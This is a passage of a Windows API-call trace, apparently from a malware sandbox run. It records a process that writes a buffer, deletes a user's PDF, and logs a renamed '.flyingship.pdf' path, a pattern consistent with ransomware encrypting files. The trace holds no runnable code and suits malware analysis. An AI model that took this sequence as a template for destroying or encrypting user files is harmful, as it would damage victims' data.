lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0172.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0172.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.425] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0172.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bdab0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.425] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0172.426] WriteFile (in: hFile=0x138, lpBuffer=0xa5f008*, nNumberOfBytesToWrite=0xe8ff, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesWritten=0x87eae0*=0xe8ff, lpOverlapped=0x0) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0172.427] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0172.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0172.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0172.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.428] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.428] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.428] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.428] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.428] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0172.428] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.428] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.430] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.430] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.430] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", lpFilePart=0x0) returned 0x45 [0172.432] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f79cf20, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x786873d0, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0xc216520, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xe8ff, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Lxb_fXCsV.pdf", cAlternateFileName="LXB_FX~1.PDF")) returned 0x90ae18 [0172.432] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\lxb_fxcsv.pdf")) returned 1 [0172.437] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f79cf20, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x786873d0, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0xc216520, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xe8ff, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Lxb_fXCsV.pdf", cAlternateFileName="LXB_FX~1.PDF")) returned 0 [0172.437] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0172.437] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.438] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.438] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.438] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.438] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.438] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0172.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0172.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.438] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.439] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.439] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.440] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.440] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0172.440] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.440] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0172.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.441] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0172.441] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x1081, lpOverlapped=0x0) returned 1 [0172.442] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0172.442] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1081, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.442] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0172.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.flyingship.pdf\r\n", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0172.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53) returned 0x8c4a48 [0172.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.flyingship.pdf\r\n", cchWideChar=83, lpMultiByteStr=0x8c4a48, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.flyingship.pdf\r\n", lpUsedDefaultChar=0x0) returned 83 [0172.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.442] 